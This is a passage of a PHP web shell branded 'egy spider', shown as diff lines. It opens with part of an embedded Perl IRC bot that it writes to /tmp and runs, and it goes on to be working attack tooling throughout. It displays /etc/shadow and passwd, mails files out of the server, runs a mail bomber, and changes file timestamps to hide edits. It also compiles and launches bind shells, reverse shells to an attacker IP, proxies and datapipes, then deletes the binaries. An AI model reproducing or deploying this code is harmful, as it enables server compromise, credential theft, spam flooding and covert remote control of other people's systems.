s/[.*\/](\S+)/$1/; + + my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'}; + my \$longip = unpack(\"N\",inet_aton(\$meuip)); + + my @filestat = stat(\$arquivo); + my \$size_total=\$filestat[7]; + if (\$size_total == 0) { + return(0); + } + + my (\$porta, \$sendsock); + do { + \$porta = int rand(64511); + \$porta += 1024; + \$sendsock = 
IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock); + } until \$sendsock; + + \$DCC{\$sendsock}{tipo} = 'send'; + \$DCC{\$sendsock}{nick} = \$nick; + \$DCC{\$sendsock}{bytes} = \$size_total; + \$DCC{\$sendsock}{arquivo} = \$arquivo; + + &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\"); + +} + +sub GET { + my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_; + return(0) if (-e \"\$arquivo\"); + if (open(FILE, \"> \$arquivo\")) { + close FILE; + } else { + return(0); + } + + my \$dccip=fixaddr(\$dcclongip); + return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1); + my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0); + \$dccsock->autoflush(1); + \$dcc_sel->add(\$dccsock); + \$DCC{\$dccsock}{tipo} = 'get'; + \$DCC{\$dccsock}{itime} = time; + \$DCC{\$dccsock}{nick} = \$nick; + \$DCC{\$dccsock}{bytes} = \$bytes; + \$DCC{\$dccsock}{curbyte} = 0; + \$DCC{\$dccsock}{arquivo} = \$arquivo; + \$DCC{\$dccsock}{ip} = \$dccip; + \$DCC{\$dccsock}{porta} = \$dccporta; + \$DCC{\$dccsock}{status} = \"Recebendo\"; +} +############################ +# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. 
dai o ADM.pl lista os sockets e faz as perguntas +sub Status { + my \$socket = shift; + my \$sock_tipo = \$DCC{\$socket}{tipo}; + unless (lc(\$sock_tipo) eq \"chat\") { + my \$nick = \$DCC{\$socket}{nick}; + my \$arquivo = \$DCC{\$socket}{arquivo}; + my \$itime = \$DCC{\$socket}{itime}; + my \$ftime = time; + my \$status = \$DCC{\$socket}{status}; + \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime}); + + my \$d_time = \$ftime-\$itime; + + my \$cur_byte = \$DCC{\$socket}{curbyte}; + my \$bytes_total = \$DCC{\$socket}{bytes}; + + my \$rate = 0; + \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0; + my \$porcen = (\$cur_byte*100)/\$bytes_total; + + my (\$r_duv, \$p_duv); + if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) { + \$r_duv = $3; \$r_duv++ if $4 >= 5; + \$rate = \"$1\.$2\".\"\$r_duv\"; + } + if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) { + \$p_duv = $3; \$p_duv++ if $4 >= 5; + \$porcen = \"$1\.$2\".\"\$p_duv\"; + } + return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\"); + } + + return(0); +} + +# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor) +sub fixaddr { + my (\$address) = @_; + + chomp \$address; # just in case, sigh. + if (\$address =~ /^\d+$/) { + return inet_ntoa(pack \"N\", \$address); + } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { + return \$address; + } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation! 
+ return inet_ntoa(((gethostbyname(\$address))[4])[0]); + } else { + return; + } +} +############################ +"; +$bot = "/tmp/ircs.pl"; +$open = fopen($bot,"w"); +fputs($open,$file); +fclose($open); +$cmd="perl $bot"; +$cmd2="rm $bot"; +system($cmd); +system($cmd2); +$_POST['cmd']="echo \"Now script try connect to ircserver ...\""; + +} + + +if(!isset($_COOKIE[$lang[$language.'_text137']])) { + $ust_u=''; + if($unix && !$safe_mode){ + foreach ($userful as $item) { + if(which($item)){$ust_u.=$item;} + } + } + if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";} + if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";} + if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";} + if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";} + if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";} + if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";} + if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";} + if(substr($ust_u,0,1)==",") {$ust_u[0]="";} + + $ust_u = trim($ust_u); +}else { + $ust_u = trim($_COOKIE[$lang[$language.'_text137']]); +} + +if(!isset($_COOKIE[$lang[$language.'_text138']])) { + $ust_d=''; + if($unix && !$safe_mode){ + foreach ($danger as $item) { + if(which($item)){$ust_d.=$item;} + } + } + if(!$safe_mode){ + foreach ($danger as $item) { + if(ps($item)){$ust_d.=$item;} + } + } + if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";} + if(substr($ust_d,0,1)==",") {$ust_d[0]="";} + + $ust_d = trim($ust_d); +}else { + $ust_d = trim($_COOKIE[$lang[$language.'_text138']]); +} + +if(!isset($_COOKIE[$lang[$language.'_text142']])) { + + $select_downloaders='<select size="1" name=with>'; + if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option 
value=\"fopen\">fopen</option>";$downloader="fopen";} + if($unix && !$safe_mode){ + foreach ($downloaders as $item) { + if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";} + } + } + $select_downloaders .= '</select>'; + if(substr($downloader,0,1)==",") {$downloader[0]="";} + + $downloader=trim($downloader); + +} + + +echo $head; +echo '</head>'; + +echo '<<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#dadada><tr><td bgcolor=#000000 width=120><font face=Comic Sans MS size=1>'.ws(2).'<DIV dir=ltr align=center><p><font style="font-weight: 500" face="Webdings" color="#800000" size="7">!</font></p>'.ws(2).'<DIV dir=ltr align=center><SPAN +style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px"> +<SPAN +style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">egy spider</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>'. + +'</center></font>'.$fe.'</td>'.'<td bgcolor=#333333><font face=#FFFFFF size=-2>'; +echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]"; +echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";} +echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";} +echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]"; + +echo "<br>"; + +echo ws(2)."PHP Version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>")); +echo "</b>".ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=red>ON</font>"; } else { echo 
"<font color=green>OFF</font>"; } +echo "</b>".ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "MySQLi: <b>"; +$mysqli_on = @function_exists('mysqli_connect'); +if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "MSQL: <b>"; +$msql_on = @function_exists('msql_connect'); +if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "SQLite: <b>"; +$sqlite_on = @function_exists('sqlite_open'); +if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b><br>".ws(2); + +echo "Safe_Mode: <b>"; +echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>")); +echo "</b>".ws(2); +echo "Open_Basedir: <b>"; +if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};} +else {echo "<font color=green>NONE</font></b>";} +echo ws(2)."Safe_Exec_Dir: <b>"; +if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Safe_Gid: <b>"; +if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};} +else {echo "<font color=red>ini_get 
disable!</font></b>";} +echo ws(2)."Safe_Include_Dir: <b>"; +if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Sql.safe_mode: <b>"; +if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} + +echo "<br>".ws(2); +echo "Disable Functions : <b>";$df='ini_get disable!'; +if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} + +if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);} +elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';} +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +echo "<br>".ws(2)."Free Space : <b>".view_size($free)."</b> Total Space: <b>".view_size($all)."</b>"; + + +if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";}; + +if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";}; + +if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";}; + + +echo "<br>".ws(2)."</b>"; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?' title=\"".$lang[$language.'_text160']."\"><b>Home</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?egy' title=\"".$lang[$language.'_text159']."\"><b>About EgY SpIdEr</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?news' title=\"".$lang[$language.'_text152']."\"><b>News</b></a> ".$rb; +echo ws(2).$lb." 
<a href='".$_SERVER['PHP_SELF']."?logout=1' title=\"".$lang[$language.'_text153']."\"><b>Logout</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=feedback' title=\"".$lang[$language.'_text180']."\"><b>Feedback & Contact Me </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=qindx' title=\"".$lang[$language.'_text154']."\"><b>Quick index </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=massbrowsersploit' title=\"".$lang[$language.'_text155']."\"><b>Mass Code Injection</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=showsrc' title=\"".$lang[$language.'_text156']."\"><b>File source </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=zone' title=\"".$lang[$language.'_text157']."\"><b>Zone-h</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=encoder' title=\"".$lang[$language.'_text158']."\"><b>Hash Tools</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>PhpInfo</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>Php.Ini</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>Cpu</b></a> ".$rb; +if(!$unix) { + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>SystemInfo</b></a> ".$rb; +}else{ + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>Syslog</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>Resolv</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>Hosts</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>Shadow</b></a> ".$rb; + echo ws(2).$lb." 
<a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>Passwd</b></a> ".$rb; +} +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>Tmp</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>Delete</b></a> ".$rb; + +if($unix && !$safe_mode) +{ + echo "<br>".ws(2)."</b>"; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>Procinfo</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>Version</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>Free</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>Dmesg</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>Vmstat</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>Interrupts</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>Realise1</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>Realise2</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb; + + echo "<br>".ws(2)."</b>"; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>W</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>Who</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>Uptime</b></a> ".$rb; + echo ws(2).$lb." 
<a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>Last</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>Ps Aux</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>Service</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>Ifconfig</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>Netstat</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>Fstab</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>Fdisk</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb; +} + +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; + +if($unix){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +if(!empty($id)) { echo ws(3).$id."<br>"; } +else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>'; + } +else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." 
gid=".@getmygid()."<br>"; +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@getenv("USERNAME")."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if($file=moreread($_POST['loc_file'])){ $filedump = $file; } + else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + $filename = @basename($_POST['loc_file']); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from egy spider shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'egy_spider@hotmail.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + err(6+$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size'])) + { + for($h=1;$h<=$_POST['mail_flood'];$h++){ + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n"); + } + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' 
-name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + else { + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(@mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } + + 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="touch") +{ +if(!$_POST['file_name_r']) + { + $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds"; + $datar = @strtotime($datar); + @touch($_POST['file_name'],$datar,$datar);} +else{ + @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r'])); +} +$_POST['cmd']=""; +} + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; } + elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; } + elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } + elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };} + else { err(1,$_POST['e_name']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars($filedump); + echo "</textarea>"; + echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>"; + echo "<input type=hidden name=dir value='".$dir."'>"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." 
\">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + morewrite($_POST['e_name'],$_POST['e_text']); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + @touch($_POST['e_name'],$mtime,$mtime); + } + + +if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl")) +{ + cf($tempdir.'prxpl',$prx_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &'); + @unlink($tempdir.'prxpl'); + $_POST['cmd']="ps -aux | grep prxpl"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf($tempdir.'bd.c',$port_bind_bd_c); + $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c'); + @unlink($tempdir.'bd.c'); + $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &'); + @unlink($tempdir.'bd'); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf($tempdir.'bdpl',$port_bind_bd_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &'); + @unlink($tempdir.'bdpl'); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf($tempdir.'back',$back_connect); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &'); + @unlink($tempdir.'back'); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." 
...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf($tempdir.'back.c',$back_connect_c); + $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c'); + @unlink($tempdir.'back.c'); + $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &'); + @unlink($tempdir.'back'); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf($tempdir.'dp',$datapipe_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &'); + @unlink($tempdir.'dp'); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf($tempdir.'dpc.c',$datapipe_c); + $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c'); + @unlink($tempdir.'dpc.c'); + $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &'); + @unlink($tempdir.'dpc'); + $_POST['cmd']="ps -aux | grep dpc"; +} + +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } + +for($upl=0;$upl<=16;$upl++) +{ + if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){ + if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; } + else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; } + @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>"); + } +} +if (!empty($_POST['port1'])) +{ + cf("bds",$port_bind_bd_cs); + $blah = ex("chmod 777 bds"); + $blah = ex("./bds ".$_POST['port1']." 
